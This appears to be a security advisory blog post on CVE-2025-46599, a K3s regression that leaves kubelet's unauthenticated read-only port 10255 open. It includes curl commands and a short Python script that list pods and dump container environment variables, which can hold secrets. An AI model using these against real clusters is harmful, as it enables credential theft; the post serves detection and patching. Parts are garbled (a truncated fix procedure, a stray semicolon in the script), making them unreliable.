CVE-2025-46599 - K3s Kubernetes kubelet Exposes ReadOnlyPort 10255 and Leaks Cluster Secrets

In early 2025, a critical vulnerability identified as CVE-2025-46599 was discovered in K3s, the CNCF-certified lightweight Kubernetes distribution. This issue affects K3s version 1.32 up to (but not including) 1.32.4-rc1+k3s1. The bug results in the kubelet’s ReadOnlyPort getting enabled and listening on port 10255 in some installations, which can inadvertently expose sensitive cluster credentials and workload information to any unauthenticated network user.

This post breaks down what went wrong, shows how you might exploit (and fix) this vulnerability, and why it matters.

Kubernetes’ kubelet serves HTTP on two ports

- 10250: Secure port for authenticated/authorized communication.

10255: Read-only port, disabled by default since Kubernetes 1.10 due to security risks.

CVE-2025-46599 arises from a K3s configuration regression. In certain setups, especially when using the default online installation method, kubelet’s ReadOnlyPort is unintentionally enabled, exposing port 10255 without authentication. Anyone with network access to a vulnerable node can get information about all running pods, and sometimes secrets or service account tokens.

You can check if your system is exposed with

# Replace NODE_IP with the IP of your node.
curl http://NODE_IP:10255/pods

If you see JSON output describing running pods, you are vulnerable.

Example output

{
  "kind": "PodList",
  "items": [
    {
      "metadata": {
        "name": "my-app-abcdef",
        "namespace": "default"
      },
      "spec": {...},
      "status": {...}
    },
    ...
  ]
}

You can even list all running containers

curl http://NODE_IP:10255/containers/

And environment variables (watch out for secrets!)

curl http://NODE_IP:10255/containerLogs/default/my-app-abcdef/my-app-container

Here's a Python script that dumps all pods and tries to extract environment variables

import requests

node_ip = "10...5"
pods = requests.get(f"http://{node_ip}:10255/pods";).json()
for pod in pods.get("items", []):
    for container in pod.get("spec", {}).get("containers", []):
        print(f"Pod: {pod['metadata']['name']}")
        print(f"  Container: {container['name']}")
        print(f"  Env: {container.get('env')}")

K3s tries to be "easy install."

- In version 1.32, a change unintentionally left ReadOnlyPort enabled, contrary to Kubernetes best practices.

Default install scripts and cloud images were particularly affected.

- Not every setup is vulnerable, but assume exposure if you didn’t explicitly lock down kubelet ports.

Patched in K3s 1.32.4-rc1+k3s1 and later.

- Download updates: https://github.com/k3s-io/k3s/releases

Or, disable the port manually on affected nodes

1. Edit /etc/systemd/system/k3s.service or your init file.

Is my cluster at risk?

- If you followed K3s’s default installation, especially via the quick-start script, check immediately!

More Information and References

- CVE record on MITRE
- K3s GitHub Security Advisory
- K3s v1.32.4 release notes and changelog
- Kubernetes Kubelet documentation
- History of kubelet ReadOnlyPort deprecation

Conclusion

The accidental exposure of kubelet's read-only port in K3s makes it dangerously easy for network attackers to steal credentials, inspect workloads, or escalate in the cluster—even without a Kubernetes login. If you're running K3s 1.32.x (before 1.32.4-rc1+k3s1), check your nodes and upgrade as soon as possible.

Timeline

Published on: 04/25/2025 05:15:33 UTC
Last modified on: 04/29/2025 13:52:28 UTC